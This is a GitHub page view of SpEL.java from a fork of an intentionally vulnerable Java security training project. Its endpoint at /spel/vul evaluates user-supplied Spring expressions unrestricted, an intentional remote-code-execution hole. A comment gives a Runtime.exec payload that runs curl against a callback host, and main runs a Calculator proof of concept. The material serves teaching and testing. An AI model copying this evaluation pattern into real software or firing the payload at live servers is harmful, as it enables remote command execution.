forked from JoyChou93/java-sec-code
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathSpEL.java
More file actions
38 lines (32 loc) · 1.2 KB
/
SpEL.java
File metadata and controls
38 lines (32 loc) · 1.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
package org.joychou.controller;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* SpEL Injection
*
* @author JoyChou @2019-01-17
*/
@RestController
public class SpEL {
/**
* SPEL to RCE
* http://localhost:8080/spel/vul/?expression=xxx.
* xxx is urlencode(exp)
* exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
*/
@RequestMapping("/spel/vul")
private static String rce(String expression) {
ExpressionParser parser = new SpelExpressionParser();
// fix method: SimpleEvaluationContext
String result = parser.parseExpression(expression).getValue().toString();
return result;
}
public static void main(String[] args) {
ExpressionParser parser = new SpelExpressionParser();
String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
String result = parser.parseExpression(expression).getValue().toString();
}
}